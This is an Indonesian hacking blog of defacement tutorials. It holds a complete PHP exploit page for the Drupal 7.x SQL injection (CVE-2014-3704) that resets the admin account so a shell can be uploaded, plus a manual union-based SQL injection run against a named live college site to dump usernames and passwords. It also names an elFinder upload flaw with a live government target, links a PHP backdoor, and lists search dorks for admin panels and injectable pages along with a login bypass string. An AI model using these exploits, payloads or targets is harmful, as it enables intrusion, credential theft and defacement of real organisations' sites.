Powered By Blogger

Senin, 04 Mei 2020

Mantan PHP Backdoor

Welcome Back Bro.
Kali Nih Adalah Tutorial Cara Jumping Ke Server Web Lain Yg Tersembunyi Pernah Kan Kalian Pas Udah Upload Shell Habis Itu Kalian Ke Fitur Jumping Hanya 1,2 Kamar Aja? Ea Jangan Nyerah xD Barang Kali Bukan 1,2 Kamar Malah Lebih
Mesti Kalian Seperti kan Ya elah Cuma 2 Kamar Doang :v Jangan Nyerah xD
Nah Boom Kok Bisa Ada Banyak Bang? Kan Cuma 2 Kamar di shell itu Oke Gw Jelasin Kalau Nih Beda Bro Nih Shell Khusus Buat Jumping Ke Server Lain Tapi Tersembunyi  Gk Kedeteksi Ke shell kalian cuma 1,2 kamar.
Link Download Mantan PHP Backdoor  : https://pastebin.com/raw/gTYGvyq8
Fitur : Jumping1 - Jumping2 - Jumping3 - Priv8 Get Config Mantan - Dan lain²

Oke Lah Bro Thanks Cukup Sekian Tq
Thanks To : PYS404 - K1D2Z0N3 - MarsHall - Doraemon V1.5 -

Kamis, 12 September 2019

Deface Metode Drupal 7.x Sql Injection + Upload Shell

Hi Gan Welcome Back :v
Kali Nih Adalah Tutorial Site Yg Menggunakan Cms
Drupal 7.x Sql Injection + Upload Shell
Yg Di Butuhkan
- Shell C99
- Dork
- Kopi
Dork : intext:"powered by drupal" site:id
inurl: Powered by Drupal
inurl:"node/add/article" site:id
( Kembangin Lagi )
Kalian Bisa Comot Drupal Di bawah nih Terus Kalian save ( php ) upload di lolcahost Kalian atau Upload Di Web Yg Kalian Upload shell
Comot bro .
<?php ?>  <!Doctype HTML>
<html>
<head>
<title>Drupal Exploit by ./Fell Ganns</title>
<body>
</head>
<body>
<div class="mymargin">
<center>
<font color="red"><h1>Drupal Exploit Sql Injection + Upload Shell by ./Fell Ganns</h1></font>

<form method="GET" action="">
Site : <input type="text" name="url" placeholder="Example: www.site.com">
<input type="submit" name="submit" value="suck it !">
</form>
<br>
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin D&#1043;rr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
$file = fopen("rock-you.txt", "a");
error_reporting(0);
if (isset($_GET['submit'])) {
    $url = "http://" . $_GET['url'];
    $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
    $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
    $ctx = stream_context_create($params);
    $data = file_get_contents($url . '/user/login/', null, $ctx);
    echo "<h4>Scanning at \"/user/login/</h4>\"";
    if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
        $fp = fopen("rock-you.txt", 'a');
        echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
        echo '<font color="#00FF66">Finished scanning. check => </font><a href="rock-you.txt" target="_blank">Rock You </a></font> ';
        fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
        fwrite($fp, "
");
        fwrite($fp, "======================================Donnazmi==============================================================");
        fwrite($fp, "
");
        fclose($fp);
    } else {
        echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
    }
}
if (isset($_GET['submit'])) {
    $url = "http://" . $_GET['url'] . "/";
    $post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
    $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
    $ctx = stream_context_create($params);
    $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
    echo "<h4>Scanning at \"Index</h4>\"";
    if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
        $fp = fopen("rock-you.txt", 'a');
        echo "Success! User:fuckyou Pass:admin at {$url}/user/login <br>";
        echo '<font color="red">Finished scanning. check =>  </font><a href="rock-you.txt" target="_blank">Rock you !</a></font> ';
        fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
        fwrite($fp, "
");
        fwrite($fp, "======================================Donnazmi==============================================================");
        fwrite($fp, "
");
        fclose($fp);
    } else {
        echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
    }
}
?>
<br>
</div>

</body>
</html>

Kalian Buka Kira Kira Kalo Vuln Bikin
Tinggal Kalian Klik Web nya https://kntl.com/user/login
terus Kalian Login username ny : fuckyou
Password ny : admin
Nah Kalau Sudah Login ke https://kntl.com/node/add/article
Dan Pilih php Lalu Save
Duarr MemeQ Nah Bisa Kalian Apakan Saja Bebas Just Have Fun 😁
Oke Cukup sekian Bay
Next To πŸ˜€

Minggu, 08 September 2019

Deface Metode Sql Injection ( Manual )

Hi Asalamualaikum Wr.Wb
Welcome Back Babi :v Kali Nih Ada Tutorial Deface Metode Sql Injection ( Manual ) Oke Gass Saja Udah Malem Mau Tidur :v
- Dork
- Roko
- Kopi
Dork : inurl:news.php?id= site:
inurl:gallery.php?id= site:
inurl:index.php?id= site:
( Kembangin Lagi )
Live Target : http://www.maldacollege.ac.in/current-news.php?id=35

Mula Mula Kasih Tanda ' di belakang Nya seperti Ni
http://www.maldacollege.ac.in/current-news.php?id=35'

Cari Sampai Eror Gan :v
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+1-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+2-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+3-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+4-- <- Tidak Eror
http://www.maldacollege.ac.in/current-news.php?id=35+order+by+5-- <- Eror

Berarti database nya 4 gan
Cara Selanjut nya union+select
http://www.maldacollege.ac.in/current-news.php?id=35+union+select1,2,3,4--
Nah Habis itu @@version atau version()  buat liat versi berapa sql nya
Angka Togel Nya 5 rebu gan :v Oke Lanjut tod
Habis itu group_concat(table_name) di angka muncul tadi dan

perintah +from+information_schema.tables+where+table_schema=database()--

di akhir angka jadi macam nih
http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
Oke Lanjut Muncul Table Banyak Di Situ :v tahap selanjutnya mengekstrak kata2 yang mau di dump database nya di sini gw mau dump user_details setelah di etrax decimalnya adalah 757365725f64657461696c73
Bingung Cara Extrax Nya di sini  http://string-functions.com/string-hex.aspx
Nah Oke Lanjut Sekarang group_concat(column_name) <yang tadi nya table ganti jadi column dan di akhir angak tambahin

from+information_schema.columns+where+table_name=0xhasil luextra tadi--

jangan lupa mengugunakan 0x << itu
+from+nameyang tadi di dumb-- <- Yang di akhir angka jadi seperti itu
http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,concat_ws(0x3a,user_name,user_password),3,4+from+user_details--
Keluar dah Babi Username Sama Password Nya Tinggal Kalian Hash Sendiri Login ? Di Itu keliatan hehe
Oke Bay Sekian Dulu
Good Bay Next To 😁

Kamis, 05 September 2019

Bug Website Pada Gojek.com

Hi Gan Kembali Lagi ea
Kali Nih Adalah Bug Website Pada Website Transportasi Terbesar di Indonesia ya itu ( gojek.com )
Bug Nih Cukup Berbahaya Kemungkin Para Attacker Bisa Meng Upload File Mereka Atau Pun Shell Mereka
Bug Website GoJek


#- Title: Bug Website GoJek 
#- Author: Tidak dipastikan
#- Published : 7-7-2018
#- Developer : Team Go-Jek
#- Fixed in Version : -
#- Tested on : windows

========================================================================

Proof Of Concept 
Gojek Memiliki Bug Ke Amanan Pada Website Nya
Ya itu Bug Elfinder 2.0 - FileManager for web ( rc1 ) File Upload Vurlnerbility
.php .html .phtml .jpg .gif.

Cukup Besar Bug Nya Yah
Ternyata Benar saja Di sini Kita Bisa Upload File Kita

Sama Seperti Deface Metode Elfinder v 2.0 Upload Shell
inurl:/elfinder/elfinder.php.html
inurl:/elfinder v 2.0 ext:phtml
inurl:/elfinder/files/
( Kembangin Lagi )
Exploit :
http://site.com/[path]/elfinder/elfinder.html
http://site.com/[path]/elfinder/elfinder.php.html http://site.com/[path]/elfinder/src/elfinder-src.php.html
Live Target : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder.phtml

Di situ kalian Upload File ? Atau Pun shell kalian Terserah Bebas hehe
Oke Lah Cukup Sekian
Bayy Next To 😁

Sabtu, 31 Agustus 2019

Deface Metode Dorking Uploader

Hi Asalamualaikum Wr.Wb
Welcome Back Gan hehe :v Kali Ini Adalah Tutorial Deface Metode Dorking Uploader
Oke Langsung Saja Biar gk Ngantuk
- Kopi Jagan Lupa Rokok Ea
- Cewe Biar di Semangatain Padahal W Jomblo :v
- Kesabaran
- Dork
- Sabun Kalo Perlu
Dork : site:com Priv8 Linux #1 SMP
site:com /admin Priv8 #1 SMP
site:com /images Priv8 #1 SMP
site:com Uploader by #1 SMP
site:com /admin Uploader by #1 SMP
inurl:Priv8 Linux #1 SMP site:in
inurl:Priv8 /admin #1 SMP site:in
site:com priv8 Linux #1 SMP /admin
Uploader By ext:php
Uploader by AnonGhost
Uploader By Ghost Dz
Uploader By IndoXploit
Uploader By AnonSec
Uploader By ext:html
( Jangan Lupa Di Kembangin )

Mula Mula Kalian Buka Dork Nya Satu Satu Kalo Nemu Uploader ? up sc atau shell kalian bebas
Oke Gw Dapat Nih Gw Akan Upload Sc Gw Aja :v
Terus Manggil Nya Gimana Itu Tanda Biru Klik Saja Atau Kalau Kalian Nemu Uploader Lain Bingung Manggil Nya Liat itu Upload Nya di Public_html tinggal Kalian Panggil kntl.com/namasclu.html atau shell lu
Dan Bomm hehe Zon H ? Ok Bro..
Oke Lah Cukup Sekian hehe πŸ˜€
Good Bay Next To πŸ˜€

Dork Sql Injection dan Dork Bypass Admin Website Malaysia

Hi Asalamualaikum Come Back Gan hehe Udah Lama Nih Gk Buat Tutorial Karena Sibuk :v
Oke Kali nih Adalah tutorial Dork Sql Injection dan Dork Bypass Admin Website Malaysia
Bagi Yg Para Penyuka Sql Challange Mesti Harus Coba Dork Ini !!
site:my foto.php?id=
home.php?id= my
index.php?id= my
site:my gambar.php?id=
site:my product.php?id=
inurl:detail.php?id= site:my
inurl:preview.php?id= site:my
inurl:pages.php?id= site:my
inurl:download.php?id= site:my
inurl:read.php?id= site:my
inurl:news.php?id= site:my
( Bisa Kalian Kembangkan Sesuai Imajinasi Kalian )

Dan inih Dork Bypass Admin Website Malaysia Di Jamin Fresh
inurl:adm/login.php site:my
adm/panel site:my
adm/login panel site:my
Administrator login site:my
Panel admin site:my
User/login site:my
Username Password Login site:my
Panel Login site:my
index of panel login site:my
index of adm login site:my
( Kembangkan Sesuai Imajinasi Kalian )
Username sama Password Bypass Admin Apa Bang ?
Username : '="or'
Password : '="or'
Note Kalau Berhasil Masuk Dashboard Tinggal Kalian Upload Shell Dah Atau Pun Kalian Bisa Jso
Oke Cukup Sekian Lah hehe
Good Bay ...

Kamis, 08 Agustus 2019

Deface Metode Admin Mistake

Asalamualaikum Wr.Wb
Welcome Bek Ea Baby Kali Nih Deface Metode Admin Mistake Btw Di sini Ada Yg Blom Tau apa itu admin mistake ?
Admin Mistake adalah Kata Orang Orang Lu bisa Langsung Masuk Administrasinya / dashboard admin / admin panel

Oke tod Langsung saja
Yg di butuhkan
- Kopi Roko
- Otak
- Kesabaran
Dork : inurl:/admin/Dashboard.php
inurl:/panel/Dashboard.php
inurl:/admin/dashboard.php "welcome"
inurl/admin/dashboard.php "panel"
inurl:/admin/dashboard.php "logout"
inurl:/admin/Dashboard.php "home"
inurl:/admin/dashboard.php site:in
inurl:/panel/Dashboard.php intext:delhi site:in
inurl:/admin/Dashboard.php "Gallery"
inurl:/admin/Dashboard.php "Viewgallery"
inurl:/admin/Dashboard.php "addgallery"
inurl:/admin/Dashboard.php "galleryadd"
inurl:/admin/Dashboard.php "News"
inurl:/admin/Dashboard.php "AddNews"
inurl:/admin/Dashboard.php "viewNews"
inurl:/admin/Dashboard.php "artickel"
intext:"username" /admin site:inintitle:"administrator" "login" "username" "password"
inurl:/panel/login.php 'password' site:in
inurl:/login.php intitle:'login panel' 'password'Intext:/welcome/Dashboard.php
Intext:/Home/Dashboard.php site :
( Kembangin Lagi Atau Kalian Bisa Ganti site nya sesuka kalian )
Kalian Buka Dork Yg sesuka kalian Site nya ganti kali nih gw Site malaysia (my)
Sudah Masuk Dashboard Gan hehe Tinggal Kalian Upload shell Dan Gimana Manggil Nya ? Di situ ada gambar yg rusak ? Tinggal kalian pencet dan kebuka dah shell kalian hehe
Oke dah cukup Sekian
Godd Bay next to πŸ˜„

Kamis, 25 Juli 2019

Deface Metode Registrasi Member

Asalamualaikum Wr.Wb
Welcome Bek Ea :v
Kali Ini Ada Tutorial Deface Metode Registrasi Member yg di perlukan
- Sabun
- Internet
- Roko ea Biar gk ngantuk
- Dork
Dork Nya : inurl:registrasi.php site:"
inurl:member/registrasi site:"
( Jangan Lupa Kembangin ea gan )
Kalian Registrasi Dan Lalu Kalau Sudah Di Registrasi Tinggal Login
Kalau Sudah Kalian Login
Sudah Masuk Dashboard Gann Tinggal Upload Shell Kalian Di profil dan di lain-lain jadi user brain
Nah Shell Ku Udh Ter Upload Gann Terus Manggil Nya Gimana Kalian Cukup Pencet Itu Yg ada Gambar Rusak Nya
Dann Boom hehe Tinggal Kaian Apakan Bebas Mau di index jangan lupa di back up gan hehe
Oke Lah Sampe Di sini
Good Bay Next toπŸ˜€

Mantan PHP Backdoor

Welcome Back Bro. Kali Nih Adalah Tutorial Cara Jumping Ke Server Web Lain Yg Tersembunyi Pernah Kan Kalian Pas Udah Upload Shell Habis I...